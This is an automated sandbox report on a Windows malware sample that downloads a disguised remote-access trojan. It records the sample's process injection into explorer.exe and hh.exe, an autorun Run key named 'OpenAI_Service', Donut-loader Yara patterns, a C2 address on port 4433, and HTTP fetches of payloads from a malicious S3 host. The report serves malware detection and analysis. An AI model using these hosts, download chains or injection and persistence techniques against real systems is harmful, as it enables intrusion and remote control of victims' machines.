Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nrGkqbCyKP.exe

Overview

General Information

Sample name:nrGkqbCyKP.exe
renamed because original name is a hash value
Original sample name:d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d.exe
Analysis ID:1577407
MD5:84101c768bfd9493c2926066e7aaa6f2
SHA1:c2d1e93e44adce0533d063014bb222a4a40d1a37
SHA256:d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d
Tags:anydesk17-s3-ap-east-1-amazonaws-comexeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nrGkqbCyKP.exe (PID: 1644 cmdline: "C:\Users\user\Desktop\nrGkqbCyKP.exe" MD5: 84101C768BFD9493C2926066E7AAA6F2)
    • zfon.exe (PID: 5260 cmdline: "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe" MD5: 44AD77338A945FE1451861B59267A68D)
      • zfon.exe (PID: 7064 cmdline: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
        • WerFault.exe (PID: 5372 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 396 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
        • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 2212 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • hh.exe (PID: 4780 cmdline: C:\windows\hh.exe MD5: 2C8FE78D53C8CA27523A71DFD2938241)
  • explorer.exe (PID: 5664 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • zfon.exe (PID: 6104 cmdline: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 1256 cmdline: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x468161:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x4d6fff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2f02c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2df1c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x136033:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x21f67:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xf65f2:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x20f4b9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x2b0799:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x30c5ca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Click to see the 4 entries
SourceRuleDescriptionAuthorStrings
0.2.nrGkqbCyKP.exe.3df72e0.4.raw.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xbb1d9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x15c4b9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x1b82ea:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.nrGkqbCyKP.exe.3dda070.3.raw.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xd8449:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x179729:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x1d555a:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.nrGkqbCyKP.exe.3ca7600.2.raw.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xf1ff2:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x20aeb9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x2ac199:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x307fca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
7.2.zfon.exe.7ff79cfb0000.0.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x136433:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

System Summary

barindex
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 27.50.63.8, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Windows\hh.exe, Initiated: true, ProcessId: 4780, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49724
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 4084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OpenAI_Service
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T13:06:58.025877+010020528751A Network Trojan was detected192.168.2.84972427.50.63.84433TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T13:06:08.622312+010028033053Unknown Traffic192.168.2.84971252.95.160.78443TCP
2024-12-18T13:06:22.033948+010028033053Unknown Traffic192.168.2.8497183.5.239.146443TCP
2024-12-18T13:06:26.185231+010028033053Unknown Traffic192.168.2.8497193.5.237.170443TCP
2024-12-18T13:06:29.550539+010028033053Unknown Traffic192.168.2.8497203.5.237.170443TCP
2024-12-18T13:06:37.566996+010028033053Unknown Traffic192.168.2.84972152.95.162.66443TCP
2024-12-18T13:06:41.247971+010028033053Unknown Traffic192.168.2.84972252.95.162.66443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngAvira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngAvira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dllAvira URL Cloud: Label: malware
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcefReversingLabs: Detection: 23%
Source: nrGkqbCyKP.exeReversingLabs: Detection: 23%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.9% probability

Compliance

barindex
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeUnpacked PE file: 7.2.zfon.exe.7ff79cfb0000.0.unpack
Source: unknownHTTPS traffic detected: 3.5.239.146:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: nrGkqbCyKP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.dr
Source: Binary string: D:\code\personal\soft_distribute_tags\code\CSharpInstaller16\obj\Release\monodelphous.pdb source: nrGkqbCyKP.exe
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000007.00000002.2080942034.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000016.00000002.2198134102.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000019.00000002.2198456266.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: C:\Windows\hh.exeFile opened: z:Jump to behavior
Source: C:\Windows\hh.exeFile opened: x:Jump to behavior
Source: C:\Windows\hh.exeFile opened: v:Jump to behavior
Source: C:\Windows\hh.exeFile opened: t:Jump to behavior
Source: C:\Windows\hh.exeFile opened: r:Jump to behavior
Source: C:\Windows\hh.exeFile opened: p:Jump to behavior
Source: C:\Windows\hh.exeFile opened: n:Jump to behavior
Source: C:\Windows\hh.exeFile opened: l:Jump to behavior
Source: C:\Windows\hh.exeFile opened: j:Jump to behavior
Source: C:\Windows\hh.exeFile opened: h:Jump to behavior
Source: C:\Windows\hh.exeFile opened: f:Jump to behavior
Source: C:\Windows\explorer.exeFile opened: d:Jump to behavior
Source: C:\Windows\hh.exeFile opened: b:Jump to behavior
Source: C:\Windows\hh.exeFile opened: y:Jump to behavior
Source: C:\Windows\hh.exeFile opened: w:Jump to behavior
Source: C:\Windows\hh.exeFile opened: u:Jump to behavior
Source: C:\Windows\hh.exeFile opened: s:Jump to behavior
Source: C:\Windows\hh.exeFile opened: q:Jump to behavior
Source: C:\Windows\hh.exeFile opened: o:Jump to behavior
Source: C:\Windows\hh.exeFile opened: m:Jump to behavior
Source: C:\Windows\hh.exeFile opened: k:Jump to behavior
Source: C:\Windows\hh.exeFile opened: i:Jump to behavior
Source: C:\Windows\hh.exeFile opened: g:Jump to behavior
Source: C:\Windows\hh.exeFile opened: e:Jump to behavior
Source: C:\Windows\explorer.exeFile opened: c:Jump to behavior
Source: C:\Windows\hh.exeFile opened: [:Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B40E70 FindFirstFileExW,FindClose,wcscpy_s,6_2_00007FFBC1B40E70
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4EF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,8_2_000001E47C4EF350
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD260E70 FindFirstFileExW,FindClose,wcscpy_s,22_2_00007FFBAD260E70
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370

Networking

barindex
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.8:49724 -> 27.50.63.8:4433
Source: global trafficTCP traffic: 192.168.2.8:49724 -> 27.50.63.8:4433
Source: global trafficHTTP traffic detected: GET /zfon.exe HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /libcef.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /MSVCP140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /aut.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /view.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 52.95.160.78:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 3.5.239.146:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 3.5.237.170:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 3.5.237.170:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 52.95.162.66:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 52.95.162.66:443
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E3B00 recv,8_2_000001E47C4E3B00
Source: global trafficHTTP traffic detected: GET /zfon.exe HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /libcef.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /MSVCP140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /aut.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /view.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.com
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.comd
Source: nrGkqbCyKP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: nrGkqbCyKP.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nrGkqbCyKP.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nrGkqbCyKP.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nrGkqbCyKP.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
